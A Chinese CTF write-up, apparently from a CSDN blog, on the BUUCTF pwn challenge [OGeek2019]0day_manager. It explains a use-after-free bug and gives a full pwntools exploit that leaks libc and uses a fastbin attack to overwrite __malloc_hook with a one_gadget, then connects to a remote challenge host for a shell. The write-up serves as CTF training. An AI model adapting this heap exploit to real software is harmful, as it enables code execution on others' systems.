[BUUCTF-pwn] [OGeek2019]0day_manager

最新推荐文章于 2022-07-04 22:57:08 发布
最新推荐文章于 2022-07-04 22:57:08 发布
阅读量2.4k 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122683955
版权

事出反常必有妖。结构很多,不过3个基本差不多。一般菜单题也就是add,show,free这里多了个handle all 这里边允许输入删除的个数。但是这里边前半部分用的do循环,后半用的while循环。跃然通过条件判断大多数情况下可以正常运行,显然当输入0时前边会执行1次,而后边不执行。也就是堆块free了,管理指针块未清除,有UAF漏洞。

    case 2:
      for ( i = *(_QWORD **)(*(_QWORD *)(qword_203050 + 8) + 8LL); i; i = (_QWORD *)*i )
      {
        v15 = (void **)i[1];
        free(v15[1]);
        free(v15[3]);
        free(v15[5]);
        free(v15);
        if ( !--v5 )                            // 当数量为0时,v5,v4=0,但会先free 一块然后跳出,但管理块会正常直接跳出,导致第1块free后未清管理块指针,有UAF漏洞
          break;
      }
      v10 = *(_QWORD **)(*(_QWORD *)(qword_203050 + 8) + 8LL);
      while ( v10 )
      {
        if ( !v4-- )
          break;
        v16 = v10;
        v10 = (_QWORD *)*v10;
        free(v16);
      }
      result = v10;
      *(_QWORD *)(*(_QWORD *)(qword_203050 + 8) + 8LL) = v10;
      break;

沿着这个漏洞,由于是libc-2.27有tcache也就不必通过检查直接double free了。不过由于建块用calloc所以要用fastbin attack 。先要将块释放填满tcache再放入fastbin再从fastbin里修改指针错位控制realloc_hook,malloc_hook在里边写入one,relloc+n调栈得到shell 。

from pwn import *

'''
patchelf --set-interpreter ../buuoj_2.27_amd64/ld-2.27.so pwn
patchelf --add-needed ../buuoj_2.27_amd64/libc-2.27.so pwn
'''

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 27047) 
    libc_elf = ELF('../buuoj_2.27_amd64/libc-2.27.so')
    one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
    libc_start_main_ret = 0x21b97

menu = b"4. Handle in all the 0day\n"
def add2(s1,d1,s2,d2,s3,d3):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"3. Logic bug\n", b'2')
    p.sendlineafter(b":", str(s1).encode())
    p.sendlineafter(b":", d1)
    p.sendlineafter(b":", str(s2).encode())
    p.sendlineafter(b":", d2)
    p.sendlineafter(b":", str(s3).encode())
    p.sendlineafter(b":", d3)

def add3(s1,d1,s2,d2):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"3. Logic bug\n", b'3')
    p.sendlineafter(b":", str(s1).encode())
    p.sendlineafter(b":", d1)
    p.sendlineafter(b":", str(s2).encode())
    p.sendlineafter(b":", d2)

def free(num, idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b'3. Logic\n', str(idx).encode())
    p.sendlineafter(b'?', str(num).encode())

def show(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'3. Logic\n', str(idx).encode())

def pwn(one_id, one_off):
    
    context.log_level = 'debug'
    add2(8, b'A', 8, b'A', 0x500, b'A')
    free(0, 2)
    show(2)
    p.recvuntil(b'note :')
    heap_addr = u64(p.recv(8))
    print('head:', hex(heap_addr))
    
    p.recvuntil(b'shellcode :')
    libc_base = u64(p.recv(8)) - 0x60 -0x10 - libc_elf.sym['__malloc_hook']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[one_id] 
    print('libc:', hex(libc_base))

    add3(0x68, b'A', 0x68, b'A')
    [free(0, 3) for i in range(5)]  #交互的0x68 10次,7个填满tcache,3个在fastbin里得到loop

    add3(0x68, p64(libc_elf.sym['__malloc_hook'] -0x23), 0x68, b'A')
    add3(0x68, b'\x00'*8, 0x8, b'A')
    #写完data和context后会写管理块,所以改malloc_hook要放单独处理,防止得到shell前崩掉
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"3. Logic bug\n", b'3')
    p.sendlineafter(b":", str(0x68).encode())
    p.sendlineafter(b":", b'\x00'*(3+8) + p64(one_gadget) +p64(libc_elf.sym['realloc']+ one_off) )
    p.sendlineafter(b":", b'8')

    p.sendline(b'cat /flag')
    p.interactive()

#one[0],realloc+2
for i in range(1):
    for j in [2]:
        try:
            connect()
            pwn(i,j)
        except KeyboardInterrupt as e:
            exit()
        except:
            p.close()
        print ('retrying...')

 

石氏是时试
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 933
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 436
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 520
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 291
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3229
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4086
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 640
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 994
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 188
题目截图
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 281
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 247
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1155
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 243
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 558
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2028
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 674
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值